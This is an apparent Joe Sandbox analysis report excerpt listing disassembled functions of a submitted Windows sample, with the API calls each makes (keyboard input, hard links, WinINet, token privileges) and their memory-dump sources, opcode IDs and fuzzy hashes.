Instruction ID: a857e20bccfd2d53c3d0d3cefbf2034a9f6ebf2dc246940b3ad35960da8d1647
Opcode Fuzzy Hash: 7707001ff9a98a611233a33cda36621fdd6a0855f8911fd97b2464b2e964ef6d
Instruction Fuzzy Hash: EE41C631A00108AFCB14EBA5DCC1FAEB3E9EF54354F149169F919B7292DB70AD40CB94

Function 00EDBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EDBB09
GetLastError.KERNEL32(?,00000000), ref: 00EDBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EDBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EDBB80

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
Instruction ID: 86aa49b062124f245d8e2fe3a64ac685eaa050a770e7ac5d1be1f09fc7418964
Opcode Fuzzy Hash: 3352155ef35fc98e5b9b70710137c508e6075ab4ea215de7a8cd4e44b11d5073
Instruction Fuzzy Hash: 1C412539200610DFDF11EF15C584A5DBBE1EF89324B09D499E94AAB362CB34FD01CB91

Function 00EF8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8B4D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
Instruction ID: d71fa721d142b883d813735ee044ef95e41be0dd037228fb5f6aca0d4844051b
Opcode Fuzzy Hash: a6cfc9daaab3b2468eba46eb226be013742e474108dba3a16915c78b78faf0ff
Instruction Fuzzy Hash: 0331C37860020CBEEF209F18CE59FB937A5EB05324F64A652FB55F62A1DE30AD40D751

Function 00EFADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00EFAE1A
GetWindowRect.USER32(?,?), ref: 00EFAE90
PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
MessageBeep.USER32(00000000), ref: 00EFAF11

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
Instruction ID: bc1e532b06cdaa1c62ccd21030a7ba83f0f18c0f26c50abd12b76fed8e9057d2
Opcode Fuzzy Hash: decebcf7f8b65ff2e42530c415aee6a740b6236be86648fc2fa1c063a03cb7c5
Instruction Fuzzy Hash: 1B417AB560010DEFCB11CF58C884AA97BF5FF88354F1890B9E618EF251D730A882DB92

Function 00ED0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED110B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
Instruction ID: afc6c3b0af375125d776a87d17454126139125d5f6476929626c3646da73184c
Opcode Fuzzy Hash: 49acf5e04e4b3e67ac917e9c2eae214b1dc35bd77c2ce9c88af83e5fa76c981d
Instruction Fuzzy Hash: 97313B70E40688BEFB30AA658C05BF9BBA9EF45314F08629BE590723D1C3754DC69751

Function 00ED1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00ED1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED11F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00ED1243

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
Instruction ID: 5b7d5aca06f36eaba33d704ab92d21eeff32b327f76c3a1736c6b2cffede84f8
Opcode Fuzzy Hash: 317fe3cc99bf7b65ceae20adbba2c9621e1a51328d5a502e8faa2badf0493334
Instruction Fuzzy Hash: 85312B30941658BEEF308A658C047FEBBAAEB85314F04639BE590B23E1C3354956D751

Function 00EA6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA644B
__isleadbyte_l.LIBCMT ref: 00EA6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64DD

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
Instruction ID: 7a9fd5dfb8c7974e9094022d84befd829e84b87d98160a20e7e789599dce6f10
Opcode Fuzzy Hash: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
Instruction Fuzzy Hash: 3B31DE31600246AFDF218F75C844BBA7BE9FF4F314F195069E864AB1A1EB31E850DB90

Function 00EF5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00EF5189

Part of subcall function 00ED387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3897
Part of subcall function 00ED387D: GetCurrentThreadId.KERNEL32 ref: 00ED389E
Part of subcall function 00ED387D: AttachThreadInput.USER32(00000000,?,00ED52A7), ref: 00ED38A5

GetCaretPos.USER32(?), ref: 00EF519A
ClientToScreen.USER32(00000000,?), ref: 00EF51D5
GetForegroundWindow.USER32 ref: 00EF51DB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
Instruction ID: 64c93eb1a0fd2c2dba7dccfbc5ad5d119c159d34d922afe43d95a35406d2a77d
Opcode Fuzzy Hash: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
Instruction Fuzzy Hash: 99310C72901108AFDB04EFA5C8859EFB7F9EF98300F10906AE515F7252EA759E05CBA1

Function 00EFC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

GetCursorPos.USER32(?), ref: 00EFC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABBFB,?,?,?,?,?), ref: 00EFC7D7
GetCursorPos.USER32(?), ref: 00EFC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABBFB,?,?,?), ref: 00EFC85E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
Instruction ID: 466ffcb6a52cc7d55ecb3547a27d190996ef5a30557471dbca990ebdcf310f42
Opcode Fuzzy Hash: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
Instruction Fuzzy Hash: 5931713560005CAFCB15CF59C898EFA7BB6EF49364F248069FA05AB261C731AD50EB60

Function 00E90BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00E90BF2

Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0

_fprintf.LIBCMT ref: 00E90C29
OutputDebugStringW.KERNEL32(?), ref: 00EC6331

Part of subcall function 00E94CDA: _flsall.LIBCMT ref: 00E94CF3

__setmode.LIBCMT ref: 00E90C5E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
Instruction ID: f4986c94511f50cac90c6a1834a87067a4a3c5ee19228429b6b156232ed49d9b
Opcode Fuzzy Hash: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
Instruction Fuzzy Hash: 391127B29042087EDF04B3B49C42DBEBBE9DF85320F14611AF108772D2DE615D479395

Function 00EC8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8669
Part of subcall function 00EC8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8673
Part of subcall function 00EC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8682
Part of subcall function 00EC8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8689
Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC8BEB
_memcmp.LIBCMT ref: 00EC8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC8C44
HeapFree.KERNEL32(00000000), ref: 00EC8C4B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
Instruction ID: 8cf7e3e6f6d5772c81ab074cac21265e4f679f0415cfe5236c66d3d1a92c83b1
Opcode Fuzzy Hash: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
Instruction Fuzzy Hash: 87218972E02208AFCB00CFA4CB44FEEB7B8EF50345F044099E454B7241DB32AA06CB61

Function 00EE1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE1A97

Part of subcall function 00EE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
Part of subcall function 00EE1B21: InternetCloseHandle.WININET(00000000), ref: 00EE1BDD

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
Instruction ID: 185d456bd715a15d2f5769c6638c5e3889e89623a03b266c119d5b459b802510
Opcode Fuzzy Hash: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
Instruction Fuzzy Hash: 84219235200649FFDB119F628C01FBAB7ADFF84701F10105EFA15A6690E771A855D790

Function 00ECE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ECF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF5BC
Part of subcall function 00ECF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF5E2
Part of subcall function 00ECF5AD: lstrcmpiW.KERNEL32(00000000,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00ECE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE237

Strings

cdecl, xrefs: 00ECE22E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 2a4ee87c5b55b027d51826aaabf213b2468a8df3e64b49367914d9b06fb24751
Instruction ID: 91644fd818fba730444dac160a2afa4f513a8cb1637538fdbc3f8df09815e3c0
Opcode Fuzzy Hash: 2a4ee87c5b55b027d51826aaabf213b2468a8df3e64b49367914d9b06fb24751
Instruction Fuzzy Hash: 3711BE36200301EFCB29AF64D945F7A77A9FF84350B40602AF906DB260EB729852D7A0

Function 00EA5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EA5351

Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: f54c9353c708dd0cb7d2ca1c830547801f33b3655e8e3dbe24ce3ea2a555276f
Instruction ID: 337e2544accc0a90beb4fedd72d7961bb8664d80515dfe2537dde9d8111a241c
Opcode Fuzzy Hash: f54c9353c708dd0cb7d2ca1c830547801f33b3655e8e3dbe24ce3ea2a555276f
Instruction Fuzzy Hash: B4112333505A15AFCF312F70AC0066E37D89F9A3A4B10242AF944BE1A0DEB1A9448790

Function 00E74531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E74560

Part of subcall function 00E7410D: _memset.LIBCMT ref: 00E7418D
Part of subcall function 00E7410D: _wcscpy.LIBCMT ref: 00E741E1
Part of subcall function 00E7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1

KillTimer.USER32(?,00000001,?,?), ref: 00E745B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E745C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EAD6CE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
Instruction ID: 1780074d5415f6a2acb917b3103000da1cd7d1b844c5bdb3fa9dd1299542ca70
Opcode Fuzzy Hash: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
Instruction Fuzzy Hash: 6A21FCB0508784AFEB329B24DC45BE7BFEC9F45308F04509EE69E7A181C7746A84DB51

Function 00EE667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0

gethostbyname.WSOCK32(?), ref: 00EE66AC
WSAGetLastError.WSOCK32(00000000), ref: 00EE66B7
_memmove.LIBCMT ref: 00EE66E4
inet_ntoa.WSOCK32(?), ref: 00EE66EF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
Instruction ID: 9deeabf45fc551a76e666c7953e4fb3df0e9dc96f33d005f903dc2f944e54f0d
Opcode Fuzzy Hash: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
Instruction Fuzzy Hash: 9B118E36900509AFCB04EBA1DD86DEEB7F8EF58310B049065F50AB7262DF70AE04CB61

Function 00EC9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9086

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
Instruction ID: 52a5a02fb82f12a5797edcb8fa21fd6a16721776abbb8dcbe1b8658bb3c4ed20
Opcode Fuzzy Hash: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
Instruction Fuzzy Hash: 65114C79900218FFDB10DFA5C985FADBBB4FB48310F204095E904B7290D6726E11DB94

